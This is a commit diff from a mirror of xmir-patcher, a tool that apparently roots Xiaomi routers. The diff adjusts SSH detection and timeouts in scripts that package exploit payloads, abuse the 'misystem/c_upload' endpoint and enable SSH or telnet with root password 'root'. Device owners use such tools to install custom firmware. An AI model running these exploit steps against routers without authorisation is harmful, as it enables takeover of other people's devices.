aiden
/
xmir-patcher
mirror of https://github.com/openwrt-xiaomi/xmir-patcher
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix detection for active SSH-server

Browse Source
pull/24/head
remittor 2 years ago
parent c25525938b
commit db71cd312f
3 changed files with 16 additions and 10 deletions
Show Stats Download Patch File Download Diff File

17
connect.py
Unescape Escape View File

@ -62,12 +62,18 @@ print("mac = {}".format(gw.mac_address))
gw.ssh_port = 122 gw.ssh_port = 122
ret = gw.detect_ssh(verbose = 1, interactive = True) ret = gw.detect_ssh(verbose = 1, interactive = True)
if ret > 0: if ret > 0:
if gw.use_ssh:
die(0, "SSH-server already installed and running") die(0, "SSH-server already installed and running")
else:
#die(0, "Telnet-server already running")
pass
use_ssh = True
stok = gw.web_login() stok = gw.web_login()
dn_tmp = 'tmp/' dn_tmp = 'tmp/'
if gw.use_ssh: if use_ssh:
dn_dir = 'data/payload_ssh/' dn_dir = 'data/payload_ssh/'
else: else:
dn_dir = 'data/payload/' dn_dir = 'data/payload/'
@ -76,7 +82,7 @@ print("Begin creating a payload for the exploit...")
fn_payload1 = 'tmp/payload1.tar.gz' fn_payload1 = 'tmp/payload1.tar.gz'
fn_payload2 = 'tmp/payload2.tar.gz' fn_payload2 = 'tmp/payload2.tar.gz'
fn_payload3 = 'tmp/payload3.tar.gz' fn_payload3 = 'tmp/payload3.tar.gz'
if gw.use_ssh: if use_ssh:
fn_pfname = 'dropbearmulti' fn_pfname = 'dropbearmulti'
else: else:
fn_pfname = 'busybox' fn_pfname = 'busybox'
@ -134,7 +140,7 @@ with tarfile.open(fn_payload3, "w:gz", compresslevel=9) as tar:
tar.add(fn_pf3, arcname = os.path.basename(fn_pf3)) tar.add(fn_pf3, arcname = os.path.basename(fn_pf3))
tar.add(dn_tmp + fn_executor, arcname = fn_executor) tar.add(dn_tmp + fn_executor, arcname = fn_executor)
tar.add(dn_dir + fn_exploit, arcname = fn_exploit) tar.add(dn_dir + fn_exploit, arcname = fn_exploit)
if gw.use_ssh: if use_ssh:
tar.add(dn_dir + 'dropbear.uci.cfg', arcname = 'dropbear.uci.cfg') tar.add(dn_dir + 'dropbear.uci.cfg', arcname = 'dropbear.uci.cfg')
tar.add(dn_dir + 'dropbear.init.d.sh', arcname = 'dropbear.init.d.sh') tar.add(dn_dir + 'dropbear.init.d.sh', arcname = 'dropbear.init.d.sh')
@ -164,8 +170,9 @@ if (fn_payload3):
time.sleep(1) time.sleep(1)
if gw.use_ssh: if use_ssh:
print("Running SSH server on port {}...".format(gw.ssh_port)) print("Running SSH server on port {}...".format(gw.ssh_port))
gw.use_ssh = True
else: else:
print("Running TELNET and FTP servers...") print("Running TELNET and FTP servers...")
gw.use_ftp = True gw.use_ftp = True
@ -174,7 +181,7 @@ requests.get(gw.apiurl + "xqnetdetect/netspeed")
time.sleep(0.5) time.sleep(0.5)
gw.passw = 'root' gw.passw = 'root'
gw.ping(contimeout = 12) gw.ping(contimeout = 27)
print("") print("")
print("#### Connection to device {} is OK ####".format(gw.device_name)) print("#### Connection to device {} is OK ####".format(gw.device_name))

2
connect5.py
Unescape Escape View File

@ -340,7 +340,7 @@ print("")
time.sleep(0.5) time.sleep(0.5)
gw.use_ssh = True gw.use_ssh = True
gw.passw = 'root' gw.passw = 'root'
ssh_en = gw.ping(verbose = 0, contimeout = 18) # RSA host key generate slowly! ssh_en = gw.ping(verbose = 0, contimeout = 30) # RSA host key generate slowly!
if ssh_en: if ssh_en:
print('#### SSH server are activated! ####') print('#### SSH server are activated! ####')
else: else:

3
gateway.py
Unescape Escape View File

@ -500,9 +500,8 @@ class Gateway():
ip_addr = self.ip_addr ip_addr = self.ip_addr
ssh_port = self.ssh_port ssh_port = self.ssh_port
if aux_port == 0 and self.model_id > 0 and self.model_id < 22: if aux_port == 0 and self.model_id > 0 and self.model_id < 22:
if ssh_port != 122:
aux_port = 122 # exploit for "misystem/c_upload" (connect.py) aux_port = 122 # exploit for "misystem/c_upload" (connect.py)
if ssh_port == aux_port:
aux_port = 22
passw = self.passw passw = self.passw
if passw: if passw:
ret = self.check_ssh(ip_addr, ssh_port, passw, contimeout = contimeout) ret = self.check_ssh(ip_addr, ssh_port, passw, contimeout = contimeout)

Write Preview
Loading…
Cancel
Save